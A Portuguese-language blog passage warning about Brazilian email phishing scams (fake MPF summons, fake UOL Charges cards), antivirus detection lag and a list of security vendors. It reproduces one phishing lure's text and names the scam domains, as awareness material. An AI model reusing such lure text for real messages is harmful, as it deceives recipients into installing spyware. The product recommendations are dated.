Ou seja, o único indício de fraude foi o endereço de destino suspeito do link, e mesmo assim esse eventualmente poderia não ser observado ou poderia ter sido dissimulado.

Malware

Neste caso, o endereço de destino levava ao download do malware que meu antivírus (Kaspersky Internet Security 2009) identificou como o programa cavalo-de-tróia espião Trojan-Downloader.Win32.Agent.byij.

Contudo, a detecção dos programas maléficos pelos antivírus depende de uma amostra desse programa ser interceptada na Internet, identificada pelos centro de análise do fornecedor do antivírus e a devida atualização da base de dados do antivírus ser distribuída aos usuários. Isso pode levar alguns ou até muitos dias para ocorrer para cada empresa de antivírus e, até lá, os usuários estão desprotegidos por parte dos antivírus ou outros utilitários antimalware.

Além disso, cientes dessa sistemática, os fraudadores em geral alteram frequentemente o programa espião utilizado na fraude, para dificultar a detecção. Em palavras mais simples, os antivírus e programas de proteção se baseiam em uma “lista de programas malfeitores procurados”; quando o programa malware utilizado na fraude não está na lista do antivírus, ele não é detectado como malfeitor. A situação é ainda mais grave para quem não usa um bom antivírus ou não o mantém constantemente atualizado.

Figura 2: Malware apontado pelo link malicioso, nesta caso detectado pelo antivírus.

Quando submeti o programa malware para análise pelo excelente serviço gratuito VirusTotal.com, ele informou que este arquivo já havia sido analisado (outra pessoa o submeteu antes).

Talvez por isso — já que o VirusTotal.com notifica as empresas antivírus participantes do serviço sobre malwares detectados por algum dos programas — a taxa de identificação do malware tenha sido razoavelmente alta neste caso, em que foi detectado por 27 dos 39 programas antivírus testados (quase 70% deles, portanto).

Conclusão

Portanto, a lei e a segurança evoluem, o crime também. A única arma que sempre continua valendo para o usuário que quer se prevenir nessa guerra é a prática de cautela, atenção, cuidado e desconfiança constantes.

Quando se pensa em programas antivírus ou segurança internet, provavelmente são lembrados Kaspersky, Norton/Symantec, McAfee e mais um ou outro. Quando o assunto é software gratuito, a lembrança deve passar para Avira, Avast, AVG…

Mas depois de uma pesquisa minuciosa e (muito) trabalhosa, cheguei a uma mega lista de 25 produtores de software antivírus e proteção Internet, mais dois serviços de análise de malware que utilizam múltiplos antivírus simultaneamente.

A tabela resumo resultante do trabalho apresenta, para cada fornecedor, informações — centro de informação, enciclopédia de malware, listas/newsletters por e-mail e blogs — e ferramentas — produtos fornecidos, utilitários gratuitos de remoção, serviços de varredura on-line e de análise de amostras suspeitas.

Uma versão reduzida desta tabela já existia no Márcio’s Hyperlink, mas agora, a lista foi bastante reorganizada, ampliada e atualizada. Boa parte dos links anteriormente listados estava desatualizada.

Não deixe de conferir, pois não vão faltar recursos para sua informação e defesa contra pragas virtuais:

• Márcios’s Hyperlink: Segurança: Malware: Vírus

Mais um exemplo de fraude por e-mail, dessa vez na onda do processo eletrônico no Brasil.

A fraude se faz passar como originado do Ministério Público Federal, mas usa um endereço remetente (De) stradion.servicos@globo.com que nada tem a ver com o MPF.

Também manda baixar uma suposta “intimação”, mas aponta para um endereço destino ainda mais suspeito, em h1.ripway.com, igualmente nada relacionado com o Ministério Público Federal, cujo sítio real é em mpf.gov.br. Por sinal, no sítio real do MPF, um quadro em destaque no centro da página informa:

O MPF não envia e-mails. Se receber mensagem eletrônica com intimação ou divulgação de brasão, apague-a imediatamente.

Eis a imagem de reprodução da mensagem de fraude:

Ironicamente, o brasão exibido na mensagem de fraude é extraído do portal Denunciar.org.br – SaferNet Brasil, que oferece o serviço de Central Nacional de Denúncias de Crimes Cibernéticos.

Para saber mais:

• Mais fraudes na selva da Internet, por Márcio d’Ávila, 2008-02-16.
• Scam – A fraude inunda o correio eletrônico, por Márcio d’Ávila, atualizado em 2008-05-02.

Há muito tempo que eu não comentava ou alertava sobre fraudes circulantes na Internet. Não que elas tenham diminuído, pelo contrário, continuam circulando por e-mail todos os dias aos milhões, inundando caixas postais de todo mundo.

É que as fraudes por e-mail haviam se proliferado tanto nos últimos, e já há tanta informação e alertas sobre elas, que assumi que o assunto já não representava grande novidade e utilidade. Que nada!

As fraudes circulantes no Brasil praticamente sempre têm uma regra geral: Fazem proliferar em grande escala mensagens de correio eletrônico (spam) com um texto mentiroso qualquer — chamado de isca pesca-bobo ou phishing scam — que induza o usuário a clicar em um link, baixar e executar em seu computador um programa espião roubador de dados bancários e pessoais.

Monitorei e coletei por quase três anos (2004 a 2007) centenas de exemplos dessas mensagens de fraude, resultando no artigo Phishing Scam – A fraude inunda o correio eletrônico, que exibe imagens (inócuas) das amostras, que classifiquei em sete grupos de temas:

• Cartões e Mensagens
• Notificações Financeiras e Cadastrais
• Informações e Notícias Bombásticas & Apelos Dramáticos
• Download de Aplicativos/Utilitários
• Prêmios, Promoções e Campanhas
• Temas Adultos
• Formulários bancários

Também nesse artigo, listei os principais indícios de fraude, um ou mais aspectos que costumam ocorrer em uma mensagem fraudulenta e que devem aguçar a atenção e desconfiança do destinatário:

• Link destino suspeito
• Apresentação descuidada
• Informação improvável
• Impessoalidade
• Remetente desconhecido

Pode acontecer, porém, de uma fraude ser sofisticada de forma a evitar a maioria ou até todos desses aspectos. Por exemplo, o texto e a aparência da mensagem de fraude podem ser copiados de alguma mensagem legítima de algum serviço ou fonte notória, conferindo-lhe uma apresentação bem cuidada e conteúdo verossímil.

Outras fraudes podem combinar a técnica de capturar os dados do catálogo de endereços de e-mail de um computador infectado, fazendo parecer que o remetente e o destinatário sejam pessoas realmente conhecidas entre si, mitigando assim os aspectos de impessoalidade e uso de um remetente desconhecido aleatório. E é importante lembrar que a informação de remetente de um e-mail pode ser fraudada com certa facilidade, da mesma forma que se pode escrever qualquer coisa no campo de remetente ao enviar uma carta (papel) pelo Correio convencional.

Mesmo o aspecto de endereço destino suspeito em links apresentados nas mensagens às vezes podem ser dissimulados quando a fraude utiliza um domínio ou endereço que tenham correspondência lógica com o texto da fraude (por exemplo, a fraude fala de uma promoção da loja X e o fraudador consegue utilizar um endereço do tipo http://promolojax.atalho.com).

Programas antivírus e outros mecanismos de proteção Internet automatizada dificilmente conseguem ser muito efetivos para proteger os usuários nesses casos, pois fraudes diferentes se proliferam aos milhões a todo momento, com pequenas variações e mudanças entre uma e outra, o que dificulta a identificação de padrões comuns que permitam aos programas de proteção interceptarem com precisão toda a diversidade de fraudes.

Assim, o único instrumento realmente efetivo é o discernimento do usuário de Internet, ou seja, o exercício constante da desconfiança, da cautela e do bom-senso por todos que usam Internet.

No meu artigo citado, eu apresento mais informações que podem ajudar qualquer usuário a ser mais cuidadoso. Para lidar com os links suspeitos, por exemplo, a dica de segurança é relativamente simples: Sempre verifique o endereço de destino de um link antes de clicar nele. E, na dúvida, não clique.

Como quase todas as fraudes no Brasil tentam executar um programa malicioso em seu computador, outra dica central de extrema efetividade é a seguinte: se um link de uma mensagem solicitar a execução de um programa, não execute prontamente. Mesmo que a mensagem pareça ter vindo do seu melhor amigo, do seu banco, do Governo ou da sua loja preferida na Internet, duvide, questione, pergunte antes, mas não execute!

E um alerta adicional sobre a execução de programas a partir de links: Para piorar a situação, vez por outra ainda surgem fraudes que descobrem e se valem de uma falha ou vulnerabilidade de segurança de um programa de e-mail ou navegador Internet popular para conseguir fazer com que, uma vez que o link seja clicado, o programa consiga executar sem confirmação ou aviso prévio. Ou seja, é realmente melhor nem clicar em um link de uma mensagem suspeita de fraude.

Ficou assustando(a)? Infelizmente, é para ficar mesmo. A imensidão da Internet de hoje em dia é como viver nas grandes metrópoles: existe perigo em cada esquina e cada cidadão (e internauta) precisa ficar permanentemente alerta.

Apresento agora uma fraude brasileira que anda circulando por correio eletrônico nos últimos dias e que me motivou a escrever o presente post. Vi, com tristeza, que alguns conhecidos meus caíram na lorota e foram infectados!…

A fraude se faz parecer como o envio de uma charge (ilustração ou animação de humor) do UOL Charges, com um link para a suposta visualização (na verdade, instalação do programa malicioso). Esse é o tipo de tema que classifico como “Cartões e Mensagens”. Além disso, a fraude ainda combina o uso de nomes e endereços de e-mail de computadores infectados e, por isso, costuma indicar como remetente alguém que você realmente conhece.

Conforme citação que encontrei no fórum portal de segurança Linha Defensiva, esta fraude já circula há muito tempo. Eis um exemplo que coletei ontem (há variações do assunto e do texto da mensagem em circulação):

Assunto: Muito boa essa precisa ver
Remetente: (Alguém conhecido com computador infectado )

Olá fulano@dominio.com ,

Seu Amigo (a) Beltrano – ( beltrano@provedor.com )
Enviou uma WebCharges do UOLCharges no dia 15/02/2008!.

Para a visualização da Animação Utilize:

[:: Visualizar UOL Charge de fulano@dominio.com - lN4AIaCEGZkh5Sa::]

Caso o link não responda, Tente:

[:: Visualizar UOL Charge de fulano@dominio.com - lN4AIaCEGZkh5Sa_9::]

Veja uma imagem reproduzida da mensagem (por questão de privacidade, omiti o nome e e-mails do remetente e destinatário originais):

Note que o link destino (destacado em vermelho na barra de endereço, na imagem), nesse caso é suspeito e dá claro indício que nada tem a ver com o real portal de humor UOL Charges, cujos endereços são www.charges.com.br ou charges.uol.com.br. O link destino está no suspeitíssimo domínio restauracionesfr.com (existem variações desta fraude apontando para diversos outros domínios, todos eles sem nenhuma ligação ou sequer semelhança com o real Charges.com.br).

Por sinal, o portal UOL Charges já foi tão vitimado como tema freqüente de fraudes que desde 2006 tomou uma medida radical: parou de incluir links nas mensagens legítimas que o serviço permite a alguém enviar convidando um conhecido a ver uma charge. Eis a seguir reprodução do Aviso Importante divulgado no portal Charges.com.br:

Prezado(a) Internauta,

Devido o aumento do número de SPAM e vírus utilizando de forma criminosa nossa marca e a de vários outros sites de sucesso, o Charges.com.br modificou a sua forma de enviar os cartões.

À partir do dia 12/01/2006 o cartão do Charges.com.br terá apenas o código que deverá ser inserido no campo correspondente do endereço: http://charges.uol.com.br/cartao/.

O Charges.com.br está adotando a Política de Segurança de não enviar links nos cartões virtuais. Caso você receba um cartão que tenha um link, pedimos que apague, pois trata-se de um e-mail falso.

Uma sugestão final: Atualmente recomendo o uso do antivírus Kaspersky, que utilizo pessoalmente (não, não recebo nada por recomendar esse programa) há vários anos e posso atestar que é um dos mais rápidos e efetivos em detectar programas maliciosos usados nesse tipo de fraude. O Kaspersky, por sinal, foi recentemente avaliado como o melhor programa de proteção pessoal pela revista INFO Exame (fevereiro/2008) e a empresa Kaspersky Lab eleita como melhor desenvolvedor de soluções de segurança pelos leitores da revista em junho de 2007. Mas nunca se esqueça que as fraudes sempre surgem primeiro que as proteções contra elas, ou seja, nenhum programa garante proteção total nem instantânea.

É, a Internet continua uma selva.

Para saber mais:

• Malware – Software Malicioso, referências sobre vírus, pragas digitais, spyware, fraudes.
• Anatomia de uma fraude, 2007-01-04.
• Fraude do dia: Saddam, 2007-01-04. Ilustra outra fraude típica para instalar programa espião.
• Programas de fraude – nova rodada (4), 2006-09-27. Comparativo da evolução de detecção de cinco programas espiões proliferados por fraudes, entre os 27 utilitários antivírus no serviço VirusTotal.com.